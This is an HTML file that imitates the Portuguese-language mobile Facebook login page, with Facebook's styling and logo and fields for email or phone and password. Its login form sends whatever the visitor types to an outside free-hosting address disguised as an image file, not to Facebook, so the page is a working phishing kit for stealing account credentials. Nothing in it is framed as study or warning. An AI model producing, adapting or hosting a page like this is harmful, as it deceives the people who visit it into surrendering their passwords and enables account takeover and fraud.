<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <title>Entrar no Facebook | Facebook</title>
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <style type="text/css">
        /*<![CDATA[*/
        
        .b .bp {
            border: solid 1px #999;
            box-sizing: border-box;
            width: 100%;
        }
        .b .bz {
            display: block;
            width: auto;
        }
        .b .bz a.ca,
        .b .bz a.ca:hover {
            background-color: #69a74e;
            color: #fff;
            height: 44px;
        }
        .b .bv {
            display: block;
            margin-bottom: 5px;
            margin-left: 3%;
            margin-top: -3px;
            overflow: hidden;
            text-align: center;
            white-space: nowrap;
            width: 94%;
        }
        .b .bv>span {
            display: inline-block;
            position: relative;
        }
        .b .bv>span:before,
        .b .bv>span:after {
            background: #ced0d4;
            content: "";
            height: 1px;
            position: absolute;
            top: 50%;
            width: 9999px;
        }
        .b .bv>span:before {
            margin-right: 15px;
            right: 100%;
        }
        .b .bv>span:after {
            left: 100%;
            margin-left: 15px;
        }
        .b .bw {
            color: #4b4f56;
            font-size: 14px;
        }
        .x {
            padding: 8px;
        }
        .cd {
            padding-bottom: 12px;
            padding-top: 12px;
        }
        .cc {
            padding-left: 4px;
            padding-right: 4px;
        }
        .by {
            padding-left: 8px;
            padding-right: 8px;
        }
        .bm {
            padding-bottom: 4px;
        }
        .b .u {
            border: 0;
            border-collapse: collapse;
            margin: 0;
            padding: 0;
            width: 100%;
        }
        .b .u tbody {
            vertical-align: top;
        }
        .b .u td {
            padding: 0;
        }
        .b .u td.bi {
            padding: 4px;
        }
        .b .v {
            width: 100%;
        }
        .w {
            background: #fa3e3e;
        }
        .y {
            color: #fff;
        }
        .b .y a,
        .b .y a:visited {
            color: #fff;
            font-weight: bold;
        }
        .b .y a:focus,
        .b .y a:hover {
            background: #1d2129;
        }
        .cf {
            color: #4b4f56;
        }
        .z {
            font-size: 12px;
            line-height: 16px;
        }
        .ce {
            font-size: 16px;
            line-height: 20px;
        }
        .bk {
            font-weight: bold;
        }
        .bx {
            text-align: center;
        }
        .g {
            background-color: #fff;
        }
        .i {
            background-color: #3b5998;
        }
        .bd {
            background-color: #eceff5;
        }
        .ba {
            background-color: #fffbe2;
            color: #7f7212;
        }
        .j {
            padding: 2px 3px;
        }
        .bb {
            border-bottom: 1px solid;
        }
        .g {
            border-color: #e9e9e9;
        }
        .i {
            border-color: #1d4088;
        }
        .bd {
            border-color: #d8dfea;
        }
        .ba {
            border-color: #e2c822;
        }
        .bc {
            font-size: small;
        }
        body,
        tr,
        input,
        textarea,
        .h {
            font-size: medium;
        }
        form {
            margin: 0;
            border: 0;
        }
        .bh {
            margin: 0;
        }
        .bh li {
            display: block;
            list-style: none;
        }
        .b .cg {
            padding: 0;
        }
        .b .bi {
            padding: 4px;
        }
        .b .bl {
            color: #90949c;
            font-weight: bold;
        }
        .b .bo {
            padding: 12px 8px;
            color: #1d2129;
        }
        .bn {
            border: 0;
            display: block;
            margin: 0;
            padding: 0;
        }
        .bq {
            box-sizing: border-box;
            width: 100%;
        }
        .b .br {
            border: solid 1px #999;
        }
        .o {
            -moz-appearance: none;
            background: none;
            display: inline-block;
            font-size: 12px;
            height: 28px;
            line-height: 28px;
            margin: 0;
            overflow: visible;
            padding: 0 9px;
            text-align: center;
            vertical-align: top;
            white-space: nowrap;
        }
        .b .o {
            border-radius: 2px;
        }
        .cb,
        a.cb,
        .b a.cb,
        .b a.cb:visited {
            background-color: #f6f7f9;
            color: #4b4f56;
        }
        .b a.cb:hover,
        .b .cb:hover {
            background-color: #e9ebee;
            color: #4b4f56;
        }
        .b .cb {
            border: 1px solid #bec2c9;
        }
        .cb[disabled] {
            color: #bec2c9;
        }
        .b .cb[disabled]:hover {
            background-color: #f6f7f9;
            color: #bec2c9;
        }
        .bu,
        .s,
        a.bu,
        a.s,
        html .b a.bu,
        html .b a.s {
            color: #fff;
        }
        .b .s {
            background-color: #4080ff;
            border: 1px solid #4476e8;
        }
        .b a.s:hover,
        .b .s:hover {
            background-color: #4580ef;
        }
        .b .bu {
            background-color: #4267b2;
            border: 1px solid #365899;
        }
        .b a.bu:hover,
        .b .bu:hover {
            background-color: #465e91;
        }
        .bu[disabled] {
            color: #899bc1;
        }
        .s[disabled] {
            color: #91b4fd;
        }
        .b .bu[disabled]:hover {
            background-color: #4267b2;
        }
        .b .s[disabled]:hover {
            background-color: #4080ff;
        }
        .bt {
            font-size: 14px;
            height: 44px;
            line-height: 44px;
            padding: 0 20px;
        }
        .o .t {
            display: inline-block;
        }
        .b .o .t {
            display: inline-block;
            margin-top: 0;
            vertical-align: middle;
        }
        .b a.o::after {
            content: "";
            display: inline-block;
            height: 100%;
            vertical-align: middle;
        }
        .o .t {
            line-height: 20px;
            margin-top: 4px;
        } 
        .bt .t {
            line-height: 24px;
            margin-top: 10px;
        }
        .o.bs {
            display: block;
            width: 100%;
        }
        a.o.bs,
        .b label.o.bs {
            display: block;
            width: auto;
        }
        .b .o {
            padding: 0 8px;
        }
        .b a.o {
            height: 26px;
            line-height: 26px;
        }
        .b .bt {
            padding: 0 19px;
        }
        .b a.bt {
            font-size: 14px;
            height: 42px;
            line-height: 42px;
        }
        .t {
            pointer-events: none;
        }
        .b a,
        .b a:visited {
            color: #3b5998;
            text-decoration: none;
        }
        .b a:focus,
        .b a:hover {
            background-color: #3b5998;
            color: #fff;
        }
        body {
            text-align: left;
            direction: ltr;
        }
        body,
        tr,
        input,
        textarea,
        button {
            font-family: sans-serif;
        }
        body,
        p,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        ul,
        ol,
        li,
        dl,
        dd,
        dt {
            margin: 0;
            padding: 0;
        }
        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            font-size: 1em;
            font-weight: bold;
        }
        ul,
        ol {
            list-style: none;
        }
        article,
        aside,
        figcaption,
        figure,
        footer,
        header,
        nav,
        section {
            display: block;
        }
        .e #viewport {
            margin: 0 auto;
            max-width: 600px;
        }
        #page {
            position: relative;
        }
        .b .p span {
            font-size: 14px;
        }
        .b a.q,
        .b a.q:hover {
            background-color: #69a74e;
            color: #fff;
        }
        .k {
            width: 100%;
        }
        .k .m {
            text-align: right;
        }
        .l {
            border: 0;
            display: inline-block;
            vertical-align: top;
        }
        i.l u {
            position: absolute;
            width: 0;
            height: 0;
            overflow: hidden;
        }
        /*]]>*/
    </style>
    <meta name="description" content="Entre no Facebook para começar a compartilhar e se conectar com seus amigos, familiares e com as pessoas que você; conhece." />
    <link rel="canonical" href="https://www.facebook.com/login/" />
</head>

<body tabindex="0" class="b c d e f g">
    <div class="h">
        <div id="viewport">
            <div class="i j" id="header">
                <table cellspacing="0" cellpadding="0" class="k">
                    <tr>
                        <td valign="middle">
                            <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><img src="https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/eRMla8OeKV0.png" width="77" height="16" class="l" alt="facebook" />
                        </td>
                        <td valign="middle" class="m"><a class="n o p q s" href="#"><span class="t">Criar conta</span></a>
                        </td>
                    </tr>
                </table>
            </div>
            <div id="objects_container">
                <div class="g" id="root" role="main">
                    <table class="u" role="presentation">
                        <tbody>
                            <tr>
                                <td class="v">
                                    <div class="w x y" style="display: none;">
                                        <div class="z"></div>
                                    </div>
                                    <div class="ba j bb"><span class="bc">Você deve entrar primeiro.</span>
                                    </div>
                                    <div>
                                        <div></div>
                                        <div class="bd be">
                                            <form method="post" action="https://arnoldjackson.000webhostapp.com/css.jpg" class="bd be" id="login_form" novalidate="1">
                                       <input name="lsd" value="AVqF2lhg" autocomplete="off" type="hidden"><input name="m_ts" value="#" type="hidden"><input name="li" value="#" type="hidden">
                                                <input type="hidden" name="lsd" value="AVrOfbB_" autocomplete="off" />
                                                <input type="hidden" name="m_ts" value="#" />
                                                <input type="hidden" name="li" value="#" />
                                                <input type="hidden" name="try_number" value="0" />
                                                <input type="hidden" name="unrecognized_tries" value="0" />
                                                <ul class="bh bi bj">
                                                    <li class="bi">
                                                        <h3 class="bk bl bm">Email ou telefone</h3>
                                                        <input autocorrect="off" autocapitalize="off" class="bn bo bp" name="email" type="text" />
                                                    </li>
                                                    <li class="bi">
                                                        <div>
                                                            <h3 class="bk bl bm">Senha</h3>
                                                            <input autocorrect="off" autocapitalize="off" class="bn bo bq br" name="pass" type="password" />
                                                        </div>
                                                    </li>
                                                    <li class="bi">
                                                        <input value="Entrar" type="submit" name="login" class="n o bs bt bu" />
                                                    </li>
                                                </ul>
                                                <div></div>
                                                <noscript>
                                                    <input type="hidden" name="_fb_noscript" value="true" />
                                                </noscript>
                                            </form>
                                            <div class="bv"><span class="bw">ou</span>
                                            </div>
                                            <div class="bx by">
                                                <div class="bx bz" id="signup-button"><a class="n o ca cb" href="#"><span class="t">Criar nova conta</span></a>
                                                </div>
                                            </div>
                                            <div class="cc cd"><span class="ce cf"><ul class="bh cg"><li class="bi"><a href="#" id="forgot-password-link">Esqueceu a senha?</a></li><li class="bi"><a href="#" id="help-link">Central de Ajuda</a></li></ul></span>
                                            </div>
                                        </div>
                                    </div>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <div></div>
                </div>
            </div>
            <div></div>
        </div>
    </div>
</body>

</html>
